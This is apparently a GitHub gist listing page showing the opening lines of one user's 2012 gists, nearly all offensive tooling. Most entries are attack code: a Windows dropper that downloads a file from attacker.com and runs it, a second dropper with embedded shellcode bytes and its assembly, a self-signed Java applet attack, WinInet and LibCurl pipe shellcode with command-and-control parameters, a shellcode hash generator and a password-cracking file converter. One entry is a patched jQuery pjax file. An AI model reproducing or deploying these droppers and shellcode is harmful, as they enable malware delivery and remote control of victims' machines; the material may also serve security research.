

phikshun / gist:1554071
Created January 3, 2012 08:26
Patched jquery.pjax.js for rails/pjax pjax_redirect_to support.
// jquery.pjax.js
// copyright chris wanstrath
// https://github.com/defunkt/jquery-pjax
(function($){
// When called on a link, fetches the href with ajax into the
// container specified as the first parameter or with the data-pjax
// attribute on the link itself.
//
phikshun / drop.c
Created April 20, 2012 19:30
Dropper, First Take
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <urlmon.h>
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) {
const char szFilename[] = "runme.exe";
const char szDownloadUrl[] = "http://attacker.com/file.jpg";
while(1) {
if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) {
phikshun / hash.rb
Created April 21, 2012 04:58
Shellcode Function Hash Generator
#!/usr/bin/env ruby
# Interprets bin_arr as a big-endian bit vector: element 0 carries
# weight 2**31 and element 31 carries weight 2**0. Each element is
# multiplied by its weight and the products are summed; an empty
# array yields 0.
def b32_to_i(bin_arr)
  bin_arr.each_with_index.inject(0) do |acc, (bit, idx)|
    acc + bit * (2**(31 - idx))
  end
end
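# Expands num into an array of 32 bits, most significant first:
# Integer#[] yields bit i, so index 0 of the result is bit 31 and
# index 31 is bit 0. For non-negative values below 2**32 this is the
# inverse of b32_to_i.
def i_to_b32(num)
  # The map result is the return value; the original assigned it to an
  # unused local and chained a redundant .each on the enumerator.
  31.downto(0).map { |i| num[i] }
end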
phikshun / accgen.rb
Created April 23, 2012 17:39
John passwd file to mschapv2acc file converter
#!/usr/bin/ruby
require 'digest/sha1'
if !ARGV[0] || !ARGV[1]
puts "Usage: accgen.rb <john-style-passfile.txt> <mschapv2acc-bin-output>"
puts ""
puts "Takes a John-sytle passwd file as input, separated as follows:"
puts "username:::AUTH_HASH:RESPONSE_HASH:PEER_HASH"
puts "The output file is ready for mschapv2acc cracking."
puts ""
phikshun / drop2.c
Created April 25, 2012 03:08
Dropper, Take 2
#define WIN32_LEAN_AND_MEAN
#include "Windows.h"
BYTE shellcode[] =
"\xfc\x89\xe6\x81\xec\x00\x20\x00\x00\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20"
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1"
phikshun / drop2.asm
Created April 25, 2012 03:17
Dropper, Take 2, Assembly Code
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 2000h ; Alloc some stack space
call start
delta:
%include "block_api32.asm"
start:
phikshun / plugin.java
Created May 4, 2012 00:49
Self-Signed Java Applet Attack Code
import java.io.*;
import java.net.*;
import java.applet.*;
public class Plugin extends Applet {
public void init() {
Process f;
try {
java.io.BufferedInputStream in = new java.io.BufferedInputStream(new
phikshun / pipe_test.rb
Created May 29, 2012 03:04
WinInet Shellcode Pipe Test
require 'win32/pipe'
require 'timeout'
require 'injector'
def update_https_code(cnc_host, url, params, pipe)
pipe = "\\\\.\\pipe\\#{pipe}"
url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6
params = "\x00" if params.empty?
pipe_offset = (@https_pipe_code =~ /\\\\\.\\pipe\\fooo/)
url_offset = (@https_pipe_code =~ /\/12345/)
phikshun / https_winet_pipe32.asm
Created May 29, 2012 03:08
WinInet Pipe Shellcode
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 0x2000 ; Alloc some space on stack
call start
delta:
%include "block_api32.asm"
phikshun / https_curl_pipe32.asm
Created September 3, 2012 17:53
LibCurl Pipe Shellcode Win32
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 0x2000 ; Alloc some space on stack
call start
delta: